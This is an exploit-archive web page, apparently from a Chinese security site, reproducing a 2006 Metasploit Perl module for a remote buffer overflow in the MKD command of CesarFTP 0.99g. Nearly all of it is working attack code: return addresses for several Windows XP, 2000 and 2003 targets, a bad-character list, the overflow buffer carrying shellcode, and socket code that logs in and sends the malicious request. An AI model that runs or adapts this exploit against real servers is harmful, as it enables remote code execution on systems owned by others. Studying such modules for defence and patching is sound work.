首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CesarFTP 0.99g (MKD) Remote Buffer Overflow Exploit (meta)
来源:f34r.us 作者:c0rrupt 发布时间:2006-06-16  

##
#---ORIGINAL CREDITS TO h07 FOR FINDING THIS VULN---
# Ported to metasploit by c0rrupt
# ~ f34r.us ~
##

package Msf::Exploit::cesarftp_mkd;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
{
'Name' => 'CesarFTP 0.99g Buffer Overflow',
'Version' => '$Revision: 1.3 $',
'Authors' => [ 'c0rrupt [at] f34r [dot] us', ],

'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp' ],
'Priv' => 0,

'AutoOpts' => { 'EXITFUNC' => 'seh' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 21],
'USER' => [1, 'USER', 'Login name'],
'PASS' => [1, 'PASS', 'Password'],
},

'Payload' =>
{
'Space' => 325,
'BadChars' => "\x00\x09\x0a\x0d\x22\x25\x26\x27\x2f\x3a\x3e\x3f\xFF\x5c",
},

'Description' => Pex::Text::Freeform(qq{
This module exploits the buffer overflow found in the MKD command
in CesarFTP 0.99g. It is required that the user be properly logged in
before the exploit can be peformed.
}),

'Refs' =>
[
['URL', 'http://www.milw0rm.com/exploits/1906']
],

'DefaultTarget' => 0,
'Targets' =>
[
['Windows XP SP2 English', 0x7746F114 ], # comctl32
['Windows XP SP0/SP1 English', 0x776606af ],
['Windows 2003 server sp0/xp sp1 English', 0x77798428 ],
['Windows 2003 server SP1 English', 0x7caa9618 ],
['Windows 2000 SP4 English', 0x78344dd3 ],
],

'Keys' => ['ceasarftp'],

'DisclosureDate' => 'June 12 2006',
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $user = $self->GetVar('USER');
my $pass = $self->GetVar('PASS');

my $buf = "MKD " . "\n"x671 . "A"x3 . pack('V', $target->[1]) . $shellcode . "\x0d\x0a";

#pack('V', $target->[1])

#"\x23\x79\xAB\x71"

$self->PrintLine(sprintf("[*] Trying to exploit target %s ", $target->[0], ));

my $sock = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,

);

if ($sock->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $sock->GetError);
return;
}

my $r = $sock->Recv(-1, 20);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }

$self->PrintLine(sprintf("[*] Sending login credentials"));
$sock->Send("USER $user" . "\x0d\x0a");
sleep(1);

$sock->Send("PASS $pass" . "\x0d\x0a");
sleep(1);
$self->PrintLine(sprintf("[*] Sending evil request"));

$sock->Send($buf);
$self->PrintLine(sprintf("[*] Exploit complete"));


return;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS Windows XP/2K (Mrxsmb.sys)
·Pico Zip 4.01 (Long Filename)
·MS Windows (NtClose DeadLock)
·bitweaver <= 1.3 (tmpImageP
·MyBulletinBoard (MyBB) < 1.
·Mambo <= 4.6rc1 (Weblinks)
·CesarFTP 0.99g (MKD) Remote Bu
·FlashBB <= 1.1.5 (phpbb_roo
·blur6ex <= 0.3.462 (ID) Adm
·Joomla <= 1.0.9 (Weblinks)
·RCblog <= 1.03 (post) Remot
·Microsoft Excel Unicode Local
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved